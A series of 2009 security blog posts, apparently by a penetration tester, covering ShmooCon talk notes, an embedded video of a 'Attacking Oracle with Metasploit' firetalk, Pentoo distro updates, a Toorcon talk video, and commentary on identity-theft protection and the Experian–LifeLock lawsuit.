Jack Daniel talked about FOI, Failure On Investment as the only measure people are using to actually measure anything security related, which is true but is also why most senior security professionals in the US make 6 figures, you get paid enough to educate and push through those types of issues.

I didnt catch the name for the guy after Jack but he talked about how powerpoint has removed the ability for people to tell a story and other standard tufte quotes. I've had similar discussions with Michael from Security Catalyst. Again I don't disagree but there are times for powerpoint and if powerpoint rules are applied a presentation can be tolerable. The common counter for powerpoint is to just handout the slides with notes or whatever. That works great for a presentation to 10 people at work but certainly doesn't scale to a security conference. I like slides for people that do talks at security conferences that actually have content in the slides. Slides that consist of pictures of a lock, turtle, toilet, cigarette, and a trash can probably make/made perfect sense for the people who were actually sitting in the crowd but if all I get is the slides later it doesn't mean crap. I dont see how I could have pulled off my talk without powerpoint, its hard to talk about code or see the output from metasploit without actually showing it. But comments always welcome.

Ok, that is all for now...trying to get g0ne up and moving from his house so we can head back into D.C. for the talks today.

Attacking Oracle with Metasploit ShmooCon Firetalk Demo

Here is the video from my Attacking Oracle with the Metasploit Framework ShmooCon Firetalk.

Attacking Oracle with the Metasploit Framework Shmoocon Firetalk Demo Video from carnal0wnage on Vimeo.

Wednesday, February 4, 2009

Pentoo Updates

Blah blah BT4 blah blah your mom goes to college....

on other sweet distro fronts some updates to Pentoo have arrived

You can read about them here:

support for the GPU cracking is very cool. I'll ask grimmlin if I can post the link for the current alpha ISO for people to play with and the rumor is a beta is coming soon!


ShmooCon Time!

ShmooCon is almost here and I'm exited to see old friends and meet/make new ones.

I'm currently scheduled to do a "Fire Talk" sometime between 2100-2200 on Friday nite. I'll be talking for a few minutes on "Attacking Oracle with the Metasploit Framework" and I have a video demo to go with it. Hopefully it will wet the appetite to download the mixin and play/test with the code and make suggestions on features and functionality.

More info on the Fire Talks and other podcasting type stuff here:

I will of course be blogging and tweeting throughout the con.

See everyone this weekend!

New Shool Information Gathering Toorcon X Edition Video

I ripped the DVD from my talk at Toorcon X on New School Information Gathering.

Should be embedded below.

Toorcon X Gates: New School Information Gathering from carnal0wnage on Vimeo.

Sorry I dont have other videos and dont know when/if they will ever be released.

Tuesday, February 3, 2009

Identity Theft Protection Racket

Really good post on philosecurity on Identity Theft and the Protection Racket the Credit Card companies are running.

I tend to agree, if the credit card companies were really losing money everyone would have credit alerts and locks for free but right now, like data breaches, its really the user's problems and not the credit card companies or the people that lost the data.

Of real interest is that it mentions LifeLock got sued because it was issuing credit alerts on behalf of its customers.

"Last year Experian sued identity theft protection firm, LifeLock, for activating fraud alerts on behalf of hundreds of thousands of clients. Experian “claimed that alerts should be entered only when people have already been victimized by identity theft or have legitimate reasons to believe that they are at imminent risk.(Network World, 2008.) I’ve heard that “identity theft occurs every 79 seconds.” Does that count?"